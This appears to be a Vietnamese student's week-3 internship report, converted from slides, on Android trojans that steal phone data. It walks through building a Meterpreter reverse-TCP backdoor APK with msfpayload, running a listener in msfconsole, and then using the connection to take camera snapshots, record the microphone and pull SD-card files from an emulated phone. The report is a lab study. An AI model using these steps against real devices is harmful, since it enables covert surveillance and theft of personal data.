Athena tuần 3

15
TRUNG TÂM ĐÀO TẠ O QUN TRMNG & AN NINH MNG QUC T ĐỀ TÀI : NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI BÁO CÁO TUẦN 3 GVHD: VÕ ĐỖ THNG SVTH: TRN THANH THÔNG MSSV: 1120168

Transcript of Athena tuần 3

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG

QUỐC TẾ

ĐỀ TÀI :

NGHIÊN CỨU CÁC TROJAN, MALWARE

CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH

SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN

THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI

BÁO CÁO TUẦN 3

GVHD: VÕ ĐỖ THẮNG

SVTH: TRẦN THANH THÔNG

MSSV: 1120168

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 1

PHẦN 1: THỰC HIỆN TRÊN MẠNG LAN

1.1. Nghiên cứu và cài đặt Kali Linux trên VMware

1.2. Tạo mã độc trên Kali Linux xâm nhập Android

1.2.1. Tạo mã độc trên Kali Linux

Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi

máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử

dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau:

Bấm vào VM Settings... ở thanh lựa chọn của Vmware

Bấm vào Network Adapter và chọn Bridged: connection directly to the

physical network

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 2

Bấm vào Edit => Virtual Network Editor...

Trên phần Bridge (connect VMs directly to the external network) chọn

adapter của máy thật

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 3

Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android

Đầu tiên mở Terminal và gõ dòng lệnh

Msfpayload android/meterpreter/reverse_tcp lhost=192.168.126.130

lport=8080 R > /root/Desktop/hack.apk

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 4

192.168.126.130 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig

để xem IP của máy Kali

8080 là số port, có thể chọn port khác, không nên chọn các port thường sử

dụng

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 5

Lệnh trên sẽ tạo ra 1 file hack.apk trên desktop của Kali, đây chính là một

Metasploit reverse tcp backdoor.

Tiếp theo, gõ lệnh msfconsole

Sau khi msfconsole load xong, ta tạo một handler để xử lí dữ liệu truyền về

bằng cách gõ lệnh sau:

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 6

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.126.130 – nhập địa chỉ IP giống với khi tạo payload ở trên.

set lport 8080 – nhập port giống với port khi tạo payload ở trên.

Exploit

Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

Thử với một máy Samsung Galaxy S3 giả lập, tải về hack.apk, cài đặt và

mở lên được giao diện như dưới, nhấp vào nút reverse_tcp

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 7

Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như

sau:

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 8

Để xem thông tin về máy, nhập lệnh SysInfo

1.2.2. Thực hiện khai thác dữ liệu trong SDcard

a. Sử dụng camera

Để xem danh sách camera, nhập webcam_list

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 9

Để chụp hình bằng camera, nhập webcam_snap x với x là ID của camera

xem ở danh sách camera ở phần trước. Ví dụ như sau:

File hình đã chụp từ camera của máy android là GBgAyecQ.jpg được lưu ở

/root của máy

b. Ghi âm

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 10

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về

máy

c. Lấy file từ SDcard

Để vào SDcard, nhập lệnh cd /sdcard và lệnh ls để xem danh sách file, thư

mục

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 11

Ví dụ ở đây, ta tải file hack-1.apk trong thư mục download của SDcard

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 12

Dùng lệnh cd /sdcard/Download để vào thư mục

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 13

Như trên hình, ta thấy 2 file là hack-1.apk và hack.apk, để tải hack-1.apk

về máy, ta nhập lệnh

Download hack-1.apk

Và file này sẽ được tải về thư mục root của máy Kali

BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp

dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi

ra ngoài

Trang 14